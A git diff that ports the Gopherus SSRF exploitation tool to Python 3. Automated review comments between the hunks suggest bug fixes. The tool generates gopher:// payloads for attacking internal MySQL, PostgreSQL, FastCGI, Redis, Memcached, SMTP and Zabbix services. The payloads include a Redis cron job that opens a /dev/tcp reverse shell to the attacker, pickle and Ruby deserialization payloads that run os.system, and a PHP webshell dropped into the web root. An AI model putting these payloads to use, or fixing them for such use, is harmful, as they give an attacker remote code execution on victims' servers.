diff --git a/.gitignore b/.gitignore
index 0d20b64..feae5c1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1 +1,2 @@
 *.pyc
+__pycache__
\ No newline at end of file
diff --git a/README.md b/README.md
index a5409db..29b16c8 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,11 @@
 # Gopherus
 If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server. And for more information you can get a blog on the same [Blog on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+
+## Note :
+
+This repo is a fork from the Original Tool but I have updated the code from python2 to python3 (because python2 is dead) and added a new feature to select the port for the reverse shell(Redis).
+
 ## About
 This tool can generate payload for following:
 1. MySQL (Port-3306)
diff --git a/gopherus.py b/gopherus.py
deleted file mode 100755
index e7dd713..0000000
--- a/gopherus.py
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/usr/bin/python2
-import argparse
-import sys
-sys.path.insert(0,'./scripts/')
-from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix
-
-parser = argparse.ArgumentParser()
-parser.add_argument("--exploit",
- help="mysql,\n"
- "postgresql,\n"
- "fastcgi,\n"
- "redis,\n"
- "smtp,\n"
- "zabbix,\n"
- "pymemcache,\n"
- "rbmemcache,\n"
- "phpmemcache,\n"
- "dmpmemcache")
-args = parser.parse_args()
-
-class colors:
- reset='\033[0m'
- red='\033[31m'
- green='\033[32m'
- orange='\033[33m'
- blue='\033[34m'
-
-print colors.green + """
-
- ________ .__
- / _____/ ____ ______ | |__ ___________ __ __ ______
-/ \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/
-\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\
- \______ /\____/| __/|___| /\___ >__| |____//____ >
- \/ |__| \/ \/ \/
-""" + "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset
-
-if(not args.exploit):
- print parser.print_help()
- exit()
-
-if(args.exploit=="mysql"):
- MySQL.MySQL()
-elif(args.exploit=="postgresql"):
- PostgreSQL.PostgreSQL()
-elif(args.exploit=="fastcgi"):
- FastCGI.FastCGI()
-elif(args.exploit=="redis"):
- Redis.Redis()
-elif(args.exploit=="smtp"):
- SMTP.SMTP()
-elif(args.exploit=="zabbix"):
- Zabbix.Zabbix()
-elif(args.exploit=="dmpmemcache"):
- DumpMemcached.DumpMemcached()
-elif(args.exploit=="phpmemcache"):
- PHPMemcached.PHPMemcached()
-elif(args.exploit=="rbmemcache"):
- RbMemcached.RbMemcached()
-elif(args.exploit=="pymemcache"):
- PyMemcached.PyMemcached()
-else:
- print parser.print_help()
diff --git a/gopherus3.py b/gopherus3.py
new file mode 100755
index 0000000..6dc9b28
--- /dev/null
+++ b/gopherus3.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python3
+import argparse
+import sys
+sys.path.insert(0, './scripts/')
+from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix
+
+
+class colors:
+ reset='\033[0m'
+ red='\033[31m'
+ green='\033[32m'
+ orange='\033[33m'
+ blue='\033[34m'
+
+
+def main():
+ parser = argparse.ArgumentParser()
+ parser.add_argument("--exploit",
+ help="mysql,\n"
+ "postgresql,\n"
+ "fastcgi,\n"
+ "redis,\n"
+ "smtp,\n"
+ "zabbix,\n"
+ "pymemcache,\n"
+ "rbmemcache,\n"
+ "phpmemcache,\n"
+ "dmpmemcache")
+ args = parser.parse_args()
+ print(colors.green + """
+ ________ .__ ________
+ / _____/ ____ ______ | |__ ___________ __ __ ______ \_____ \
+ / \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ _(__ <
+ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ / \\
+ \______ /\____/| __/|___| /\___ >__| |____//____ > /______ /
+ \/ |__| \/ \/ \/ \/
+ """+ "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset)
+
+ if(not args.exploit):
+ print(parser.print_help())
+ sys.exit(1)
+
+ if(args.exploit=="mysql"):
+ MySQL.MySQL()
+ elif(args.exploit=="postgresql"):
+ PostgreSQL.PostgreSQL()
+ elif(args.exploit=="fastcgi"):
+ FastCGI.FastCGI()
+ elif(args.exploit=="redis"):
+ Redis.Redis()
+ elif(args.exploit=="smtp"):
+ SMTP.SMTP()
+ elif(args.exploit=="zabbix"):
+ Zabbix.Zabbix()
+ elif(args.exploit=="dmpmemcache"):
+ DumpMemcached.DumpMemcached()
+ elif(args.exploit=="phpmemcache"):
+ PHPMemcached.PHPMemcached()
+ elif(args.exploit=="rbmemcache"):
+ RbMemcached.RbMemcached()
+ elif(args.exploit=="pymemcache"):
+ PyMemcached.PyMemcached()
+ else:
+ print(parser.print_help())
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/install.sh b/install.sh
index 96408f2..9a7e4d9 100755
--- a/install.sh
+++ b/install.sh
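Review bot: `print(parser.print_help())` in both the `if(not args.exploit)` branch and the final `else` prints a stray `None` line, because `ArgumentParser.print_help()` writes the help text to stdout itself and returns None; both should be just `parser.print_help()`. The `else` branch then falls through to exit status 0 for an unrecognised `--exploit` value while the first branch uses `sys.exit(1)`, so add `sys.exit(1)` after the help there too for a consistent failure status. With `scripts/__init__.py` deleted at the end of this diff, `from scripts import …` only resolves as an implicit namespace package, which works on Python 3.3+ but deserves a one-line comment; the CWD-relative `sys.path.insert(0, './scripts/')` looks redundant for that import — presumably a leftover, confirm before dropping it.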
@@ -1,5 +1,6 @@
 #!/bin/bash
-python2 -m pip install argparse
-python2 -m pip install requests
-chmod +x gopherus.py
-ln -sf $(pwd)/gopherus.py /usr/local/bin/gopherus
+
+pip3 install -r requirements.txt
+chmod +x gopherus3.py
+sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3
+echo "Gopherus3 installed"
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..05f27b4
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,2 @@
+argparse
+requests
\ No newline at end of file
diff --git a/scripts/DumpMemcached.py b/scripts/DumpMemcached.py
index cd7a24f..6d74416 100644
--- a/scripts/DumpMemcached.py
+++ b/scripts/DumpMemcached.py
@@ -1,12 +1,12 @@
-import urllib
+import urllib.parse
 def DumpMemcached():
- code = raw_input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
+ code = input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
- payload = urllib.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ payload = urllib.parse.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
 finalpayload = "gopher://127.0.0.1:11211/_%0d%0a" + payload + "%0d%0a"
- print "\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m"
- print finalpayload
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m")
+ print(finalpayload)
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m")
diff --git a/scripts/FastCGI.py b/scripts/FastCGI.py
index edf6b12..5708740 100644
--- a/scripts/FastCGI.py
+++ b/scripts/FastCGI.py
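Review bot: `sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3` leaves the command substitution unquoted, so a checkout path containing whitespace is word-split and the symlink is created against the wrong target; write `sudo ln -sf "$(pwd)/gopherus3.py" /usr/local/bin/gopherus3`. `pip3 install -r requirements.txt` installs into whichever `pip3` is first on PATH for the invoking user, while the symlink step is the only one run under `sudo`, so the interpreter that later runs the tool is not necessarily the one that received the packages; `python3 -m pip install --user -r requirements.txt` ties both to the same interpreter. The script has no `set -e`, so a failed pip step still ends with `echo "Gopherus3 installed"`.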
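Review bot: `argparse` should not be listed: it has been part of the standard library since Python 3.2, and the entry makes `pip3 install -r requirements.txt` fetch the unmaintained PyPI backport of the same name, an unnecessary third-party package on the install path. None of the files in this diff import `requests` either; if nothing outside the diff uses it, the file is empty and the pip step in install.sh can go — confirm against the rest of the repository first.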
@@ -1,12 +1,12 @@
-import urllib
+import urllib.parse
 def FastCGI():
- filename = raw_input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m")
+ filename = input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m")
 if(not filename):
 filename="/usr/share/php/PEAR.php"
- command=raw_input("\033[96m" +"Terminal command to run: "+ "\033[0m")
+ command=input("\033[96m" +"Terminal command to run: "+ "\033[0m")
 length=len(command)+52
 char=chr(length)
@@ -25,10 +25,11 @@ def FastCGI():
 payload = start + data + end
- def get_payload(payload):
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/")
- return "gopher://127.0.0.1:9000/_" + finalpayload
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m")
+ print("\033[04m" + get_payload(payload)+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m"
- print "\033[04m" + get_payload(payload)+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+
+def get_payload(payload):
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/")
+ return "gopher://127.0.0.1:9000/_" + finalpayload
\ No newline at end of file
diff --git a/scripts/MySQL.py b/scripts/MySQL.py
index 8353f9b..690c8ff 100644
--- a/scripts/MySQL.py
+++ b/scripts/MySQL.py
@@ -1,7 +1,6 @@
-
 def MySQL():
- print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m"
- user = raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
+ print("\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m")
+ user = input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
 encode_user = user.encode("hex")
 user_length = len(user)
 temp = user_length - 4
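Review bot: `encode_user = user.encode("hex")` is Python 2 codec usage that the port leaves untouched; on Python 3 `str.encode("hex")` raises `LookupError: 'hex' is not a text encoding`, so `MySQL()` fails on the line right after the username prompt for every input. The same pattern survives in this file's next hunk (`query = query.encode("hex")` and `query_length.decode('hex')[::-1].encode('hex')` inside `get_payload`, where `str` has no `.decode` on Python 3 at all) and in PostgreSQL.py's first hunk (`encode_user = user.encode("hex")`, `encode_db = db.encode("hex")`). The Python 3 equivalents are `encode_user = user.encode().hex()`, `query = query.encode().hex()` and `query_length = bytes.fromhex(query_length)[::-1].hex()`. MySQL's body continues outside this hunk.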
@@ -13,26 +12,26 @@ def MySQL():
 dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
 dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
- query = raw_input("\033[96m" +"Give query to execute: "+ "\033[0m")
+ query = input("\033[96m" +"Give query to execute: "+ "\033[0m")
 auth = dump.replace("\n","")
- def encode(s):
- a = [s[i:i + 2] for i in range(0, len(s), 2)]
- return "gopher://127.0.0.1:3306/_%" + "%".join(a)
-
-
- def get_payload(query):
- if(query.strip()!=''):
- query = query.encode("hex")
- query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
- query_length = query_length.decode('hex')[::-1].encode('hex')
- pay1 = query_length + "0003" + query
- final = encode(auth + pay1 + "0100000001")
- return final
- else:
- return encode(auth)
-
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" + get_payload(query)+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" + get_payload(query,auth)+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
+
+
+def encode(s):
+ a = [s[i:i + 2] for i in range(0, len(s), 2)]
+ return "gopher://127.0.0.1:3306/_%" + "%".join(a)
+
+def get_payload(query,auth):
+ if(query.strip()!=''):
+ query = query.encode("hex")
+ query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
+ query_length = query_length.decode('hex')[::-1].encode('hex')
+ pay1 = query_length + "0003" + query
+ final = encode(auth + pay1 + "0100000001")
+ return final
+ else:
+ return encode(auth)
\ No newline at end of file
diff --git a/scripts/PHPMemcached.py b/scripts/PHPMemcached.py
index 6de9da9..34ed59c 100644
--- a/scripts/PHPMemcached.py
+++ b/scripts/PHPMemcached.py
@@ -1,20 +1,20 @@
-import urllib
+import urllib.parse
 def PHPMemcached():
- print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m"
+ print("\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m")
- code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m")
+ code = input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m")
 if(not code):
- print "\033[93m" + "Plz give payload" + "\033[0m"
+ print("\033[93m" + "Plz give payload" + "\033[0m")
 exit()
 payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m"
- print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m")
+ print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/PostgreSQL.py b/scripts/PostgreSQL.py
index 16b4d68..f50ac22 100644
--- a/scripts/PostgreSQL.py
+++ b/scripts/PostgreSQL.py
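Review bot: `exit()` on the empty-payload branch is the interactive convenience name installed by the `site` module rather than a language builtin, so it is missing under `python3 -S` or an embedded interpreter, and it exits with status 0 for what is an input error; the file only imports `urllib.parse`, so add `import sys` and use `sys.exit(1)`, as gopherus3.py already does. Redis.py's first hunk has the same `exit(1)` in its `else` branch, also without a `sys` import.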
@@ -1,7 +1,7 @@
 def PostgreSQL():
- user = raw_input("\033[96m" + "PostgreSQL Username: " + "\033[0m")
- db = raw_input("\033[96m" + "Database Name: " + "\033[0m")
- query = raw_input("\033[96m" + "Query: " + "\033[0m")
+ user = input("\033[96m" + "PostgreSQL Username: " + "\033[0m")
+ db = input("\033[96m" + "Database Name: " + "\033[0m")
+ query = input("\033[96m" + "Query: " + "\033[0m")
 encode_user = user.encode("hex")
 encode_db = db.encode("hex")
@@ -16,11 +16,13 @@ def PostgreSQL():
 packet = start + data + end
- def encode(s):
- a = [s[i:i + 2] for i in range(0, len(s), 2)]
- return "gopher://127.0.0.1:5432/_%" + "%".join(a)
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" + encode(packet) + "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" + encode(packet) + "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
+
+def encode(s):
+ a = [s[i:i + 2] for i in range(0, len(s), 2)]
+ return "gopher://127.0.0.1:5432/_%" + "%".join(a)
\ No newline at end of file
diff --git a/scripts/PyMemcached.py b/scripts/PyMemcached.py
index ae8f5b5..353cdb5 100644
--- a/scripts/PyMemcached.py
+++ b/scripts/PyMemcached.py
@@ -1,10 +1,10 @@
-import cPickle
+import pickle
 import os
-import urllib
+import urllib.parse
 def PyMemcached():
- print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m"
- server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
+ print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m")
+ server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
 if(not server):
 server = "127.0.0.1"
@@ -16,18 +16,18 @@ def __reduce__(self):
 if(cmd):
 return (os.system,(cmd,))
- command = (cPickle.dumps(PickleRCE()))
+ command = (pickle.dumps(PickleRCE()))
- def get_payload(command):
- payload = urllib.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a"
- return finalpayload
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m"
+ print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m")
- print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m"
+ print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
- print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+def get_payload(command):
+ payload = urllib.parse.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a"
+ return finalpayload
\ No newline at end of file
diff --git a/scripts/RbMemcached.py b/scripts/RbMemcached.py
index 3c1ffac..104d255 100644
--- a/scripts/RbMemcached.py
+++ b/scripts/RbMemcached.py
@@ -1,8 +1,8 @@
-import urllib
+import urllib.parse
 def RbMemcached():
- print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m"
- server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
+ print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m")
+ server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
 if(not server):
 server = "127.0.0.1"
@@ -13,17 +13,18 @@ def RbMemcached():
 payload = """\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0e@instanceo:\x08ERB\x06:\t@srcI\"""" + chr(len(cmd)+10)
 payload += "%x(" + cmd + """);\x06:\x06ET:\x0c@method:\x0bresult:\t@varI"\x0c@result\x06;\tT:\x10@deprecatoro:\x1fActiveSupport::Deprecation\x06:\x0e@silencedT"""
- def get_payload(payload):
- payload_len = len(payload)
- payload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a"
- return finalpayload
- print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m"
- print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m")
+ print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m")
+ print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+ print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
- print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
- print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+
+def get_payload(payload):
+ payload_len = len(payload)
+ payload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a"
+ return finalpayload
\ No newline at end of file
diff --git a/scripts/Redis.py b/scripts/Redis.py
index fbea515..67c5518 100644
--- a/scripts/Redis.py
+++ b/scripts/Redis.py
@@ -1,16 +1,30 @@
-import urllib
+import urllib.parse
 def Redis():
- def get_Redis_ReverseShell():
- server = raw_input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m")
- crontab_dir = raw_input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m")
- if(not server):
- server = "127.0.0.1"
- if(not crontab_dir):
- crontab_dir = "/var/spool/cron/"
- cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/1234 0>&1"'
- len_cmd = len(cmd) + 5
- payload = """*1\r
+ print("\033[01m"+"\nReady To get SHELL\n"+ "\033[0m")
+ what = input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m")
+ what = what.lower()
+ if("rev" in what):
+ get_Redis_ReverseShell()
+ elif("php" in what):
+ get_Redis_PHPShell()
+ else:
+ print("\033[93m" +"Plz choose between those two"+ "\033[0m")
+ exit(1)
+
+def get_Redis_ReverseShell():
+ server = input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m")
+ port = input("\033[96m" +"\nGive your Port to connect with victim through Revershell (default is 1234): "+ "\033[0m")
+ crontab_dir = input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m")
+ if(not server):
+ server = "127.0.0.1"
+ if(not crontab_dir):
+ crontab_dir = "/var/spool/cron/"
+ if(not port):
+ port = "1234"
+ cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/'+port+' 0>&1"'
+ len_cmd = len(cmd) + 5
+ payload = """*1\r
 $8\r
 flushall\r
 *3\r
@@ -48,23 +62,22 @@ def get_Redis_ReverseShell():
 save\r
 """
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m"
- print "\033[01m" +"\nBefore sending request plz do `nc -lvp 1234`"+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
-
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ print("\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m")
+ print("\033[01m" +"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
- def get_Redis_PHPShell():
- web_root_location = raw_input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m")
- php_payload = raw_input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m")
- default = ""
- if(not php_payload):
- php_payload = default
- if(not web_root_location):
- web_root_location = "/var/www/html"
- payload = """*1\r
+def get_Redis_PHPShell():
+ web_root_location = input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m")
+ php_payload = input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m")
+ default = ""
+ if(not php_payload):
+ php_payload = default
+ if(not web_root_location):
+ web_root_location = "/var/www/html"
+ payload = """*1\r
 $8\r
 flushall\r
 *3\r
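Review bot: The hint line lost its closing backtick: the removed line printed the command wrapped as `` `nc -lvp 1234` ``, while the replacement ``"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m"`` ends at the port, so the output now has an unbalanced backtick with the reset escape glued to the port number. Insert ``+ "`"`` between `port` and `+ "\033[0m"`, or rewrite the message as one f-string so the literal backticks are visibly paired. `get_Redis_ReverseShell` starts outside this hunk.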
@@ -101,20 +114,8 @@ def get_Redis_PHPShell():
 save\r
 """
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m"
- print "\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
-
-
- print "\033[01m"+"\nReady To get SHELL\n"+ "\033[0m"
- what = raw_input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m")
- what = what.lower()
- if("rev" in what):
- get_Redis_ReverseShell()
- elif("php" in what):
- get_Redis_PHPShell()
- else:
- print "\033[93m" +"Plz choose between those two"+ "\033[0m"
- exit()
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ print("\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m")
+ print("\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/SMTP.py b/scripts/SMTP.py
index a005fd0..9324127 100644
--- a/scripts/SMTP.py
+++ b/scripts/SMTP.py
@@ -1,11 +1,11 @@
-import urllib
+import urllib.parse
 def SMTP():
- print "\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m"
- mailfrom = raw_input("\033[96m" +"Mail from : "+ "\033[0m")
- Mailto = raw_input("\033[96m" +"Mail To : "+ "\033[0m")
- subject = raw_input("\033[96m" +"Subject : "+ "\033[0m")
- msg = raw_input("\033[96m" +"Message : "+ "\033[0m")
+ print("\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m")
+ mailfrom = input("\033[96m" +"Mail from : "+ "\033[0m")
+ Mailto = input("\033[96m" +"Mail To : "+ "\033[0m")
+ subject = input("\033[96m" +"Subject : "+ "\033[0m")
+ msg = input("\033[96m" +"Message : "+ "\033[0m")
 commands = [
 'MAIL FROM:' + mailfrom,
@@ -18,8 +18,8 @@ def SMTP():
 ]
 payload = "%0A".join(commands)
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/Zabbix.py b/scripts/Zabbix.py
index 216faed..3edf32f 100644
--- a/scripts/Zabbix.py
+++ b/scripts/Zabbix.py
@@ -1,15 +1,15 @@
-import urllib
+import urllib.parse
 def Zabbix():
- print "\033[01m"+"\nExecute SHELL command: \n" + "\033[0m"
- command = raw_input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m")
+ print("\033[01m"+"\nExecute SHELL command: \n" + "\033[0m")
+ command = input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m")
 if(not command):
 command = "ls"
